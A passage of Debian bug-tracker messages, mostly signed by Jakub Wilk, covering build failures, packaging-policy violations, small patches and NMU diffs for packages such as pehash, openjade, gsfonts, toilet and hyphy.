symbols missing] | dh_makeshlibs: failing due to earlier errors | debian/rules:6: recipe for target 'binary-arch' failed | make: *** [binary-arch] Error 2 Full build log: https://buildd.debian.org/status/fetch.php?pkg=exiv2=i386=0.26-1=1500287864 -- Jakub Wilk
Bug#868554: pehash: segmentation fault
Control: forwarded -1 https://github.com/merces/pev/pull/110 I've forwarded the patch upstream. -- Jakub Wilk
Bug#868554: pehash: segmentation fault
Control: tags -1 + patch
The attached patch fixes it for me.
The const annotation is bogus, because this variable is going to be modified in
the next line.
* Adrian Bunk <b...@debian.org>, 2017-07-16, 19:10:
$ pescan test.exe
file entropy:5.924796 (normal)
fpu anti-disassembly:no
imagebase: normal
entrypoint: normal
DOS stub:normal
TLS directory: found - 1 function(s)
timestamp: normal
section count: 15 (high)
Segmentation fault
Good catch. My patch seems to fix this, too.
--
Jakub Wilk
--- a/src/output.c
+++ b/src/output.c
@@ -288,7 +288,7 @@
scope->depth = scope_depth + 1;
if (scope_depth > 0) {
- output_scope_t * const parent_scope = NULL;
+ output_scope_t * parent_scope = NULL;
STACK_PEEK(g_scope_stack, (void *)_scope);
scope->parent_type = parent_scope->type;
}
Bug#862475: libyaml-syck-perl: Unconditionally instantiates objects from yaml data
* Christoph Biedl <debian.a...@manchmal.in-ulm.de>, 2017-05-13, 11:49: use YAML::XS qw(LoadFile); I think you attached wrong reproducer. -- Jakub Wilk
Bug#867278: mitmproxy: DistributionNotFound: The 'typing==3.5.2.2' distribution was not found and is required by mitmproxy
Package: mitmproxy Version: 0.18.2-6 Severity: serious Justification: Policy §3.5 After upgrading python-typing to 3.6.1-1, mitmproxy broke completely: $ mitmproxy --help Traceback (most recent call last): File "/usr/bin/mitmproxy", line 6, in from pkg_resources import load_entry_point File "/usr/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 3037, in @_call_aside File "/usr/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 3021, in _call_aside f(*args, **kwargs) File "/usr/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 3050, in _initialize_master_working_set working_set = WorkingSet._build_master() File "/usr/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 657, in _build_master return cls._build_from_requirements(__requires__) File "/usr/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 670, in _build_from_requirements dists = ws.resolve(reqs, Environment()) File "/usr/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 855, in resolve raise DistributionNotFound(req, requirers) pkg_resources.DistributionNotFound: The 'typing==3.5.2.2' distribution was not found and is required by mitmproxy -- System Information: Versions of packages mitmproxy depends on: ii python 2.7.13-2 ii python-backports.ssl-match-hostname 3.5.0.1-1 ii python-blinker 1.3.dfsg2-1 ii python-brotli0.6.0-1 ii python-certifi 2017.4.17-1 ii python-click 6.6-1 ii python-configargparse0.11.0-1 ii python-construct 2.8.8+really2.5.2-0.1 ii python-cryptography 1.9-1 ii python-cssutils 1.0-4.1 ii python-flask 0.12.2-1 ii python-h22.5.2-1 ii python-hpack 2.3.0-1 ii python-html2text 2016.9.19-1 ii python-hyperframe4.0.1-1 ii python-jsbeautifier 1.6.4-6 ii python-lxml 3.8.0-1+b1 ii python-openssl 16.2.0-1 ii python-passlib 1.7.1-1 ii python-pil 4.1.1-3 ii python-pyasn10.1.9-2 ii python-pyparsing 2.1.10+dfsg1-1 ii python-pyperclip 1.5.27-2 ii python-requests 2.12.4-1 ii python-six 1.10.0-4 ii python-tornado 4.5.1-2+b1 ii python-typing3.6.1-1 ii python-urwid 1.3.1-2+b2 ii python-watchdog 0.8.3-2 -- Jakub Wilk
Bug#841453: linux-image-4.7.0-1-amd64: can't upgrade to -unsigned: rmdir: failed to remove '/lib/modules/4.7.0-1-amd64': Directory not empty
Package: linux-image-4.7.0-1-amd64 Version: 4.7.6-1 Severity: serious I you have linux-image-4.7.0-1-amd64 installed, then upgrading to linux-image-4.7.0-1-amd64-unsigned fails: # apt-get install linux-image-4.7.0-1-amd64-unsigned Reading package lists... Done Building dependency tree Reading state information... Done Suggested packages: linux-doc-4.7 (4.7.8-1) debian-kernel-handbook (1.0.17) grub-pc (2.02~beta3-1) | grub-efi-amd64 (2.02~beta3-1) | extlinux (3:6.03+dfsg-14) Recommended packages: firmware-linux-free (3.4) irqbalance (1.1.0-2) The following packages will be REMOVED: linux-image-4.7.0-1-amd64* (4.7.6-1) The following NEW packages will be installed: linux-image-4.7.0-1-amd64-unsigned (4.7.8-1) 0 upgraded, 1 newly installed, 1 to remove and 35 not upgraded. Need to get 36.8 MB of archives. After this operation, 1709 kB disk space will be freed. Do you want to continue? [Y/n] Get:1 http://ftp.debian.org/debian unstable/main amd64 linux-image-4.7.0-1-amd64-unsigned amd64 4.7.8-1 [36.8 MB] Fetched 36.8 MB in 1s (28.7 MB/s) debconf: delaying package configuration, since apt-utils is not installed (Reading database ... 14226 files and directories currently installed.) Removing linux-image-4.7.0-1-amd64 (4.7.6-1) ... W: Last kernel image has been removed, so removing the default symlinks /etc/kernel/postrm.d/initramfs-tools: update-initramfs: Deleting /boot/initrd.img-4.7.0-1-amd64 Selecting previously unselected package linux-image-4.7.0-1-amd64-unsigned. (Reading database ... 10177 files and directories currently installed.) Preparing to unpack .../linux-image-4.7.0-1-amd64-unsigned_4.7.8-1_amd64.deb ... Unpacking linux-image-4.7.0-1-amd64-unsigned (4.7.8-1) ... Setting up linux-image-4.7.0-1-amd64-unsigned (4.7.8-1) ... I: /vmlinuz.old is now a symlink to boot/vmlinuz-4.7.0-1-amd64 I: /initrd.img.old is now a symlink to boot/initrd.img-4.7.0-1-amd64 I: /vmlinuz is now a symlink to boot/vmlinuz-4.7.0-1-amd64 I: /initrd.img is now a symlink to boot/initrd.img-4.7.0-1-amd64 /etc/kernel/postinst.d/initramfs-tools: update-initramfs: Generating /boot/initrd.img-4.7.0-1-amd64 cp: cannot stat '/etc/modprobe.d/*': No such file or directory (Reading database ... 14224 files and directories currently installed.) Removing linux-image-4.7.0-1-amd64 (4.7.6-1) ... Purging configuration files for linux-image-4.7.0-1-amd64 (4.7.6-1) ... W: Last kernel image has been removed, so removing the default symlinks rmdir: failed to remove '/lib/modules/4.7.0-1-amd64': Directory not empty dpkg: error processing package linux-image-4.7.0-1-amd64 (--purge): subprocess installed post-removal script returned error exit status 1 Errors were encountered while processing: linux-image-4.7.0-1-amd64 E: Sub-process /usr/bin/dpkg returned an error code (1) -- System Information: Debian Release: stretch/sid APT prefers unstable APT policy: (500, 'unstable') Architecture: amd64 (x86_64) Kernel: Linux 4.7.0-1-amd64 (SMP w/2 CPU cores) Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968) Shell: /bin/sh linked to /bin/dash Init: unable to detect Versions of packages linux-image-4.7.0-1-amd64 depends on: ii initramfs-tools [linux-initramfs-tool] 0.125 ii kmod22-1.1 ii linux-base 4.5 -- Jakub Wilk
Bug#841442: lintian: FTBFS: fail tests::shared-libs-non-pic-i386
Source: lintian Version: 2.5.48 Severity: serious Justification: fails to build from source lintian FTBFS on i386: | tests::shared-libs-non-pic-i386: diff -u t/tests/shared-libs-non-pic-i386/tags /home/jwilk/lintian-2.5.48/debian/test-out/tests/shared-libs-non-pic-i386/tags.shared-libs-non-pic-i386 | --- t/tests/shared-libs-non-pic-i386/tags 2015-10-05 20:08:38.0 + | +++ /home/jwilk/lintian-2.5.48/debian/test-out/tests/shared-libs-non-pic-i386/tags.shared-libs-non-pic-i386 2016-10-20 17:45:44.831884940 + | @@ -1 +0,0 @@ | -E: libbaz3-1: shlib-with-non-pic-code usr/lib/libbaz3.so.1.0.3b | fail tests::shared-libs-non-pic-i386: output differs! [...] | Failed tests (1) | tests::shared-libs-non-pic-i386 | debian/rules:48: recipe for target 'runtests' failed -- Jakub Wilk
Bug#841286: jison depends on contrib packages (node-ebnf-parser, node-cjson)
Package: jison Version: 0.4.17+dfsg-3 Severity: serious Justification: Policy §2.2.1 This package is in main, but it depends on node-ebnf-parser and node-cjson, which are both in contrib. -- Jakub Wilk
Bug#841056: dvi2dvi: license requires package rename
Source: dvi2dvi Version: 2.0alpha-9.2 Severity: serious debian/copyright reads: 3. The package name of the modified software must not be ``dvi2dvi'' or ``dvi2dvi-'' where is the version number. Debian did modify the software, but our package is still called "dvi2dvi", contrary to the license requirements. -- Jakub Wilk
Bug#840581: vim-conque: ConqueTerm doesn't appear to load into vim
Hi David! * David Cantrell <da...@cantrell.org.uk>, 2016-10-12, 22:59: Having installed the vim-conque package, I start vim: $ vim and then try to start bash within it: :ConqueTerm bash and just get this error: E492: Not an editor command: ConqueTerm bash It looks like a bunch of files got installed in /usr/share/vim-conque, but they don't seem to get loaded when vim starts. As per Debian Packaging Policy for Vim, vim addons are not enabled by default. You have to enable it yourself with vim-addon-manager (or by manually creating appropriate symlinks). This is documented in README.Debian. -- Jakub Wilk
Bug#840182: flent recommends netperf, which is non-free
* Toke Høiland-Jørgensen <t...@toke.dk>, 2016-10-09, 13:18: flent has netperf in Recommends. But netperf is non-free. As per policy §2.2.1, packages in main must not require or recommend packages outside main. Would it be OK to demote it to 'Suggests'? Yes, that would be fine. -- Jakub Wilk
Bug#840182: flent recommends netperf, which is non-free
Package: flent Version: 0.15.0-1 Severity: serious flent has netperf in Recommends. But netperf is non-free. As per policy §2.2.1, packages in main must not require or recommend packages outside main. -- Jakub Wilk
Bug#837915: package builds crashing under fakeroot
* Graham Inggs <gin...@debian.org>, 2016-10-04, 12:33: Not sure how to fix it for aster as apparently building the elements catalog is part of the upstream install run. Maybe the upstream build system can be modified to build that catalog during build, not install? I'm not really familiar with aster's build system. I happened to upload the last NMU in order to fix a build with PETSc. Let me see: $ ./waf --help | grep buildelem buildelem : execute the build for elements catalog only using an installed Aster (also performed at install) So it should be a matter of adding "waf buildelem" to override_dh_auto_build... Nope, that would be too easy: $ ./waf buildelem Waf: Entering directory `/home/jwilk/aster-11.5.0+dfsg2/build' No function build_elements defined in /home/jwilk/aster-11.5.0+dfsg2/catalo/wscript I've filed a bug upstream: https://bitbucket.org/code_aster/codeaster-src/issues/84 -- Jakub Wilk
Bug#823419: openjade: diff for NMU version 1.4devel1-21.3
Control: tags 823419 + pending Dear maintainer, I've prepared an NMU for openjade (versioned as 1.4devel1-21.3) and uploaded it to DELAYED/1. Please feel free to tell me if I should delay it longer. -- Jakub Wilk diffstat for openjade-1.4devel1 openjade-1.4devel1 changelog |9 + rules |1 + 2 files changed, 10 insertions(+) No differences were encountered between the control files diff -Nru openjade-1.4devel1/debian/changelog openjade-1.4devel1/debian/changelog --- openjade-1.4devel1/debian/changelog 2016-10-01 17:30:14.0 +0200 +++ openjade-1.4devel1/debian/changelog 2016-10-01 17:30:15.0 +0200 @@ -1,3 +1,12 @@ +openjade (1.4devel1-21.3) unstable; urgency=low + + * Non-maintainer upload. + * Pass -fno-lifetime-dse to GCC to work around invalid assumptions about +object lifetimes (closes: #823419). Thanks to Daniel Schepler for the bug +report. + + -- Jakub Wilk <jw...@debian.org> Sat, 01 Oct 2016 17:01:25 +0200 + openjade (1.4devel1-21.2) unstable; urgency=medium * Non-maintainer upload. diff -Nru openjade-1.4devel1/debian/rules openjade-1.4devel1/debian/rules --- openjade-1.4devel1/debian/rules 2016-10-01 17:30:14.0 +0200 +++ openjade-1.4devel1/debian/rules 2016-10-01 17:30:15.0 +0200 @@ -31,6 +31,7 @@ CFLAGS += -ffunction-sections CXXFLAGS += -ffunction-sections endif +CXXFLAGS += -fno-lifetime-dse # https://gcc.gnu.org/bugzilla/show_bug.cgi?id=69534 export CFLAGS export CXXFLAGS
Bug#823419: openjade: Broken if rebuilt using g++-6 and glibc 2.23
* Jakub Wilk <jw...@debian.org>, 2016-10-01, 16:52: See https://bugzilla.redhat.com/show_bug.cgi?id=1306162 for the analysis. Oops, I actually meant: https://gcc.gnu.org/bugzilla/show_bug.cgi?id=69534 -- Jakub Wilk
Bug#823419: openjade: Broken if rebuilt using g++-6 and glibc 2.23
Control: tags -1 + patch See https://bugzilla.redhat.com/show_bug.cgi?id=1306162 for the analysis. The attached patch fixes it for me. -- Jakub Wilk diff -Nru openjade-1.4devel1/debian/rules openjade-1.4devel1/debian/rules --- openjade-1.4devel1/debian/rules 2016-10-01 16:50:44.0 +0200 +++ openjade-1.4devel1/debian/rules 2016-10-01 16:50:45.0 +0200 @@ -31,6 +31,7 @@ CFLAGS += -ffunction-sections CXXFLAGS += -ffunction-sections endif +CXXFLAGS += -fno-lifetime-dse # https://gcc.gnu.org/bugzilla/show_bug.cgi?id=69534 export CFLAGS export CXXFLAGS
Bug#823419: openjade: Broken if rebuilt using g++-6 and glibc 2.23
Control: severity -1 grave Control: affects -1 + docbook-utils Reproducer: $ openjade -d /usr/share/docbook-utils/docbook-utils.dsl < /dev/null openjade:0:1:0:E: end of document in prolog Aborted Backtrace: #0 0xf7fd7d09 in __kernel_vsyscall () #1 0xf77badc0 in __libc_signal_restore_set (set=0xa900) at ../sysdeps/unix/sysv/linux/nptl-signals.h:79 #2 __GI_raise (sig=6) at ../sysdeps/unix/sysv/linux/raise.c:55 #3 0xf77bc287 in __GI_abort () at abort.c:89 #4 0xf7e96c3a in Collector::check (this=0x8712198) at Collector.cxx:86 #5 0xf7e97183 in Collector::collect (this=) at Collector.cxx:159 #6 0xf7e971df in Collector::makeSpace (this=0x8712198) at Collector.cxx:47 #7 0xf7edf02d in Collector::allocateObject (hasFinalizer=true, this=0x8712198) at Collector.h:142 #8 OpenJade_DSSSL::ClosureObj::operator new (c=...) at Insn.h:396 #9 OpenJade_DSSSL::ClosureInsn::execute (this=0x8f5b408, vm=...) at Insn.cxx:638 #10 0xf7ee0c2a in OpenJade_DSSSL::VM::eval (this=0xacc4, insn=, display=0x0, arg=0x0) at Insn.cxx:151 #11 0xf7ef0e93 in OpenJade_DSSSL::Identifier::computeValue (this=0x8d64e78, force=false, interp=...) at Interpreter.cxx:1887 #12 0xf7ea75a6 in OpenJade_DSSSL::VariableExpression::optimize (this=0x8d698c8, interp=..., env=..., expr=...) at Expression.cxx:258 #13 0xf7eaf55f in OpenJade_DSSSL::CallExpression::compile (this=0x8d698e0, interp=..., env=..., stackPos=4, next=...) at Expression.cxx:126 #14 0xf7eaf76c in OpenJade_DSSSL::Expression::optimizeCompile (next=..., stackPos=4, env=..., interp=..., expr=...) at Expression.h:378 #15 OpenJade_DSSSL::CallExpression::compile (this=0x8d69930, interp=..., env=..., stackPos=, next=...) at Expression.cxx:173 #16 0xf7ea971e in OpenJade_DSSSL::Expression::optimizeCompile (next=..., stackPos=, env=..., interp=..., expr=...) at Expression.h:378 #17 OpenJade_DSSSL::LetStarExpression::compileInits (this=0x8d69d80, interp=..., env=..., initVars=..., initIndex=, stackPos=, next=...) at Expression.cxx:793 #18 0xf7ea96ca in OpenJade_DSSSL::LetStarExpression::compileInits (this=0x8d69d80, interp=..., env=..., initVars=..., initIndex=1, stackPos=2, next=...) at Expression.cxx:790 #19 0xf7ea96ca in OpenJade_DSSSL::LetStarExpression::compileInits (this=0x8d69d80, interp=..., env=..., initVars=..., initIndex=0, stackPos=1, next=...) at Expression.cxx:790 #20 0xf7ea99fa in OpenJade_DSSSL::LetStarExpression::compile (this=0x8d69d80, interp=..., env=..., stackPos=1, next=...) at Expression.cxx:773 #21 0xf7eaa60c in OpenJade_DSSSL::Expression::optimizeCompile (next=..., stackPos=1, env=..., interp=..., expr=...) at Expression.h:378 #22 OpenJade_DSSSL::LambdaExpression::compile (this=, interp=..., env=..., stackPos=, next=...) at Expression.cxx:546 #23 0xf7ef1008 in OpenJade_DSSSL::Expression::optimizeCompile (next=..., stackPos=0, env=..., interp=..., expr=...) at Expression.h:378 #24 OpenJade_DSSSL::Identifier::computeValue (this=0x881bf88, force=false, interp=...) at Interpreter.cxx:1883 #25 0xf7ea75a6 in OpenJade_DSSSL::VariableExpression::optimize (this=0x881c048, interp=..., env=..., expr=...) at Expression.cxx:258 #26 0xf7eaf55f in OpenJade_DSSSL::CallExpression::compile (this=0x881c0a0, interp=..., env=..., stackPos=3, next=...) at Expression.cxx:126 #27 0xf7ea82a0 in OpenJade_DSSSL::CaseExpression::compile (this=, interp=..., env=..., stackPos=, next=...) at Expression.cxx:420 #28 0xf7ea8e57 in OpenJade_DSSSL::Expression::optimizeCompile (next=..., stackPos=, env=..., interp=..., expr=...) at Expression.h:378 #29 OpenJade_DSSSL::LetExpression::compile (this=0x881d5c0, interp=..., env=..., stackPos=1, next=...) at Expression.cxx:718 #30 0xf7eaa60c in OpenJade_DSSSL::Expression::optimizeCompile (next=..., stackPos=1, env=..., interp=..., expr=...) at Expression.h:378 #31 OpenJade_DSSSL::LambdaExpression::compile (this=, interp=..., env=..., stackPos=, next=...) at Expression.cxx:546 (More stack frames follow...) -- Jakub Wilk
Bug#818448: fixed in imapcopy 1.04-2.1
* Peter Michael Green <plugw...@debian.org>, 2016-09-11, 16:20: Changed-By: Peter Michael Green <plugw...@debian.org> Description: imapcopy - IMAP backup, copy and migration tool Closes: 818448 Changes: imapcopy (1.04-2.1) unstable; urgency=medium . * Non-maintainer upload. * Fix build with fpc 3.0.0 (Closes: 818448) This upload looks like it was made by Peter Green. But I was told on IRC that his only involvement was posting a patch to the BTS (with a comment that the patch was only build-tested). The actual upload was made by Gianfranco Costamagna. Gianfranco, as per Policy §4.4, please put your own name in the changelog trailer when making an upload. Please also always post debdiff to the BTS before making an NMU. (I guess that in this case debdiff is equal to what Peter posted in the BTS, but it's not obvious, and I shouldn't have to guess.) -- Jakub Wilk
Bug#836670: strip-nondeterminism: leaves temporary files behind
* Jakub Wilk <jw...@debian.org>, 2016-09-04, 16:16: https://jenkins.debian.net/job/lintian-tests_sid/lastFailedBuild/consoleText This URL is better: https://jenkins.debian.net/job/lintian-tests_sid/1267/consoleText The relevant part is: tests::changelog-file-general: diff -u t/tests/changelog-file-general/tags /tmp/testrun/debian/test-out/tests/changelog-file-general/tags.changelog-file-general --- t/tests/changelog-file-general/tags 2016-09-04 13:11:18.259885818 + +++ /tmp/testrun/debian/test-out/tests/changelog-file-general/tags.changelog-file-general 2016-09-04 13:17:22.033786444 + @@ -5,6 +5,7 @@ W: changelog-file-general: debian-changelog-file-contains-obsolete-user-emacs-settings W: changelog-file-general: debian-changelog-line-too-long line 15 W: changelog-file-general: debian-changelog-line-too-long line 8 +W: changelog-file-general: duplicate-changelog-files usr/share/doc/changelog-file-general/changelog.Debian.gz usr/share/doc/changelog-file-general/l1nNtreQxL W: changelog-file-general: improbable-bug-number-in-closes 12 W: changelog-file-general: latest-debian-changelog-entry-without-new-date W: changelog-file-general: latest-debian-changelog-entry-without-new-version fail tests::changelog-file-general: output differs! (The are many other similar failures.) This can be reproduced without running the whole Lintian test suite: $ apt-get source lintian $ cd lintian-*/ $ debian/rules runtests onlyrun=changelog-file-general -- Jakub Wilk
Bug#836670: strip-nondeterminism: leaves temporary files behind
Package: dh-strip-nondeterminism Version: 0.024-1 Severity: serious Control: affects -1 + src:lintian Justification: breaks the world dh_strip_nondeterminism leaves temporary files behind, as seen in the Lintian test suite: https://jenkins.debian.net/job/lintian-tests_sid/lastFailedBuild/consoleText (interesting part starts with "tests::changelog-file-general") -- Jakub Wilk
Bug#817488: gsfonts: diff for NMU version 1:8.11+urwcyr1.0.7~pre44-4.3
Control: tags 618635 + pending
Control: tags 817488 + patch
Control: tags 817488 + pending
I've prepared an NMU for gsfonts (versioned as
1:8.11+urwcyr1.0.7~pre44-4.3) and uploaded it to DELAYED/10. Please feel
free to tell me if I should delay it longer.
--
Jakub Wilk
diffstat for gsfonts-8.11+urwcyr1.0.7~pre44 gsfonts-8.11+urwcyr1.0.7~pre44
changelog | 12
compat|2 +-
control |3 ++-
postrm|2 +-
rules |4 +++-
5 files changed, 19 insertions(+), 4 deletions(-)
Control files: lines which differ (wdiff format)
Build-Depends: debhelper (>= [-4.0.0),-] {+5),+} sharutils
{+Depends: ${misc:Depends}+}
diff -Nru gsfonts-8.11+urwcyr1.0.7~pre44/debian/changelog gsfonts-8.11+urwcyr1.0.7~pre44/debian/changelog
--- gsfonts-8.11+urwcyr1.0.7~pre44/debian/changelog 2016-08-22 22:55:25.0 +0200
+++ gsfonts-8.11+urwcyr1.0.7~pre44/debian/changelog 2016-08-22 22:55:25.0 +0200
@@ -1,3 +1,15 @@
+gsfonts (1:8.11+urwcyr1.0.7~pre44-4.3) unstable; urgency=low
+
+ * Non-maintainer upload.
+ * Bump debhelper compatibility level to 5 (closes: #817488).
+Thanks to Niels Thykier for the bug report.
+ * Fix typo in the postrm scripts (closes: #618635).
+Thanks to Nathan Handler for the bug report and the patch.
+ * Add build-arch and build-indep targets.
+ * Add "Depends: ${misc:Depends}".
+
+ -- Jakub Wilk <jw...@debian.org> Mon, 22 Aug 2016 22:53:12 +0200
+
gsfonts (1:8.11+urwcyr1.0.7~pre44-4.2) unstable; urgency=high
* Non-maintainer upload.
diff -Nru gsfonts-8.11+urwcyr1.0.7~pre44/debian/compat gsfonts-8.11+urwcyr1.0.7~pre44/debian/compat
--- gsfonts-8.11+urwcyr1.0.7~pre44/debian/compat 2016-08-22 22:55:25.0 +0200
+++ gsfonts-8.11+urwcyr1.0.7~pre44/debian/compat 2016-08-22 22:55:25.0 +0200
@@ -1 +1 @@
-4
+5
diff -Nru gsfonts-8.11+urwcyr1.0.7~pre44/debian/control gsfonts-8.11+urwcyr1.0.7~pre44/debian/control
--- gsfonts-8.11+urwcyr1.0.7~pre44/debian/control 2016-08-22 22:55:25.0 +0200
+++ gsfonts-8.11+urwcyr1.0.7~pre44/debian/control 2016-08-22 22:55:25.0 +0200
@@ -2,7 +2,7 @@
Section: text
Priority: optional
Maintainer: Masayuki Hatta (mhatta) <mha...@debian.org>
-Build-Depends: debhelper (>= 4.0.0), sharutils
+Build-Depends: debhelper (>= 5), sharutils
Standards-Version: 3.8.0
Uploaders: Torsten Landschoff <tors...@debian.org>
Homepage: http://www.ghostscript.com/
@@ -12,6 +12,7 @@
Package: gsfonts
Architecture: all
+Depends: ${misc:Depends}
Conflicts: gs (<< 5.50-5), gs-aladdin (<< 6.50-4), gsfonts-x11 (<< 0.13)
Description: Fonts for the Ghostscript interpreter(s)
These are free look-alike fonts of the Adobe PostScript fonts.
diff -Nru gsfonts-8.11+urwcyr1.0.7~pre44/debian/postrm gsfonts-8.11+urwcyr1.0.7~pre44/debian/postrm
--- gsfonts-8.11+urwcyr1.0.7~pre44/debian/postrm 2016-08-22 22:55:25.0 +0200
+++ gsfonts-8.11+urwcyr1.0.7~pre44/debian/postrm 2016-08-22 22:55:25.0 +0200
@@ -21,7 +21,7 @@
case "$1" in
purge|remove)
- if [ -x /usr/sbin/udpate-gsfontmap ]; then
+ if [ -x /usr/sbin/update-gsfontmap ]; then
update-gsfontmap
fi
;;
diff -Nru gsfonts-8.11+urwcyr1.0.7~pre44/debian/rules gsfonts-8.11+urwcyr1.0.7~pre44/debian/rules
--- gsfonts-8.11+urwcyr1.0.7~pre44/debian/rules 2016-08-22 22:55:25.0 +0200
+++ gsfonts-8.11+urwcyr1.0.7~pre44/debian/rules 2016-08-22 22:55:25.0 +0200
@@ -28,7 +28,9 @@
touch configure-stamp
-build: build-stamp
+build: build-arch build-indep
+build-arch:
+build-indep: build-stamp
build-stamp: configure-stamp
dh_testdir
Bug#805961: toilet: diff for NMU version 0.3-1.1
Control: tags 805961 + pending I've prepared an NMU for toilet (versioned as 0.3-1.1) and uploaded it to DELAYED/3. Please feel free to tell me if I should delay it longer. -- Jakub Wilk diffstat for toilet-0.3 toilet-0.3 changelog |9 + rules | 55 ++- 2 files changed, 39 insertions(+), 25 deletions(-) No differences were encountered between the control files diff -Nru toilet-0.3/debian/changelog toilet-0.3/debian/changelog --- toilet-0.3/debian/changelog 2012-04-06 23:41:53.0 +0200 +++ toilet-0.3/debian/changelog 2016-08-22 21:05:36.0 +0200 @@ -1,3 +1,12 @@ +toilet (0.3-1.1) unstable; urgency=low + + * Non-maintainer upload. + * Fix FTBFS when building only architeture-independent packages +(closes: #805961). Thanks to Santiago Vila for the bug report and the +patch. + + -- Jakub Wilk <jw...@debian.org> Mon, 22 Aug 2016 21:05:36 +0200 + toilet (0.3-1) unstable; urgency=low * New upstream release. diff -Nru toilet-0.3/debian/rules toilet-0.3/debian/rules --- toilet-0.3/debian/rules 2012-04-06 23:45:04.0 +0200 +++ toilet-0.3/debian/rules 2016-08-22 21:02:44.0 +0200 @@ -51,34 +51,39 @@ # Build architecture-independent files here. binary-indep: build install -# We have nothing to do by default. + dh_installdocs -i -A README TODO NEWS + dh_installmenu -i + dh_installcron -i + dh_installinfo -i + dh_installmime -i + dh_installchangelogs -i ChangeLog + dh_link -i + dh_strip -i + dh_compress -i + dh_fixperms -i + dh_installdeb -i + dh_shlibdeps -i + dh_gencontrol -i + dh_md5sums -i + dh_builddeb -i # Build architecture-dependent files here. binary-arch: build install -# dh_testversion - dh_testdir - dh_testroot -# dh_installdebconf - dh_installdocs -A README TODO NEWS -# dh_installexamples - dh_installmenu -# dh_installemacsen -# dh_installpam -# dh_installinit - dh_installcron -# dh_installmanpages - dh_installinfo - dh_installmime - dh_installchangelogs ChangeLog - dh_link - dh_strip - dh_compress - dh_fixperms - dh_installdeb - dh_shlibdeps - dh_gencontrol - dh_md5sums - dh_builddeb + dh_installdocs -a -A README TODO NEWS + dh_installmenu -a + dh_installcron -a + dh_installinfo -a + dh_installmime -a + dh_installchangelogs -a ChangeLog + dh_link -a + dh_strip -a + dh_compress -a + dh_fixperms -a + dh_installdeb -a + dh_shlibdeps -a + dh_gencontrol -a + dh_md5sums -a + dh_builddeb -a binary: binary-indep binary-arch .PHONY: build clean binary-indep binary-arch binary install configure
Bug#816313: dash: executes binary data as a shell script in case of ENOEXEC (Exec format error)
* Vincent Lefevre <vinc...@vinc17.net>, 2016-02-29, 20:17: $ /bin/dash -c tadd.exe ./tadd.exe: 1: ./tadd.exe: MZ��¸@º´: not found ./tadd.exe: 2: ./tadd.exe: : not found ./tadd.exe: 1: ./tadd.exe: @.bss : not found ./tadd.exe: 1: ./tadd.exe: .textd*,: not found ./tadd.exe: 3: ./tadd.exe: JPL2@�.idata: not found ./tadd.exe: 3: ./tadd.exe: u : not found ./tadd.exe: 4: ./tadd.exe: ~@0�.CRT4�@0�.tls: not found ./tadd.exe: 5: ./tadd.exe: @B/81P: not found ./tadd.exe: 13: ./tadd.exe: Syntax error: Missing '}' This is standards-compliant behavior. SUSv3[0] reads: If the execve() function fails due to an error equivalent to the [ENOEXEC] error defined in the System Interfaces volume of IEEE Std 1003.1-2001, the shell shall execute a command equivalent to having a shell invoked with the pathname resulting from the search as its first operand, with any remaining arguments passed to the new shell, except that the value of "$0" in the new shell may be set to the command name. If the executable file is not a text file, the shell may bypass this command execution. "may" means optional behavior. I see no reason for this bug to remain release-critical. [0] http://pubs.opengroup.org/onlinepubs/009604499/utilities/xcu_chap02.html#tag_02_09_01_01 -- Jakub Wilk
Bug#825727: python-babel: FTBFS: assert 'GMT+00:00' == 'GMT-01:59'
* Chris Lamb <la...@debian.org>, 2016-05-29, 10:54: python-babel fails to build from source in unstable/amd64: https://github.com/python-babel/babel/issues/441 is probably the bug that triggers on reproducible-builds infrastructure. It remains mystery to me why it also fails in Chris's environment. -- Jakub Wilk
Bug#834718: choreonoid: maintainer address bounces
Source: choreonoid Version: 1.5.0+dfsg-0.1 Severity: serious Justification: Policy §3.3 I tried to report a bug against this package, and I got: Your mail to 'Ubuntu-devel-discuss' with the subject Bug#834715: libcnoid-dev: arch-dependent file in "Multi-Arch: same" package Is being held until the list moderator can review it for approval. The reason it is being held: Post by non-member to a members-only list As per Policy §3.3: “The email address given in the ‘Maintainer’ control field must accept mail from those role accounts in Debian used to send automated mails regarding the package. This includes non-spam mail from the bug-tracking system, […].” NB, this is caught by Lintian: E: choreonoid source: maintainer-address-causes-mail-loops-or-bounces Ubuntu Developers <ubuntu-devel-disc...@lists.ubuntu.com> -- Jakub Wilk
Bug#811866: More C++ help needed (Was: Bug#811866: fixed in hyphy 2.2.6+dfsg-4)
* Manuel A. Fernandez Montecelo <manuel.montez...@gmail.com>, 2016-08-14, 21:39: Also, if you substitute e.g. "255*.94" for "255*94/100", make sure that you use parentheses as in "(255*94)/100", otherwise you can end up with "255*(94/100) -> 255*0 -> 0" for all such values (I cannot recall the rules now, but I think that / takes precedence over *). No, "/" and "*" (and "%") have the same precedence and left-to-right associativity. So a*b/c is equivalent to (a*b)/c. -- Jakub Wilk
Bug#811866: More C++ help needed (Was: Bug#811866: fixed in hyphy 2.2.6+dfsg-4)
* Andreas Tille <andr...@an3as.eu>, 2016-08-14, 21:53: /build/hyphy-2.2.6+dfsg/src/gui/HYChartWindow.cpp:3010:54: error: no matching function for call to '_Formula::_Formula(_String&, NULL, bool)' _Formula f (*thisString,nil,false); ^ If you build against g++-5 (or look up old build logs on buildd.d.o), you get a helpful warning for this line: HYChartWindow.cpp:3010:54: warning: converting 'false' to pointer type for argument 3 of '_Formula::_Formula(_String&, _VariableContainer*, _String*)' [-Wconversion-null] _Formula f (*thisString,nil,false); ^ This code relied on automatic conversion from "false" to null pointer, which was always a dubious feature, and now no longer works in GCC 6. Changing "false" to "nil" should fix this. -- Jakub Wilk
Bug#811866: fixed in hyphy 2.2.6+dfsg-4
* Andreas Tille <andr...@an3as.eu>, 2016-08-13, 21:11:
/build/hyphy-2.2.6+dfsg/src/gui/HYChartWindow.cpp:113:1: error: narrowing
conversion of '3.0598e+1' from 'double' to 'unsigned char' inside {
} [-Wnarrowing]
...
Which is caused by:
_HYColorchartColors [HY_CHART_COLOR_COUNT] = {
{255*.94, 255*.12, 255*.11 },//(Red)
{255*.41, 255*.46, 255*.91 },//(Evening Blue)
{255, 255*.91, 255*.34 },//(Banana)
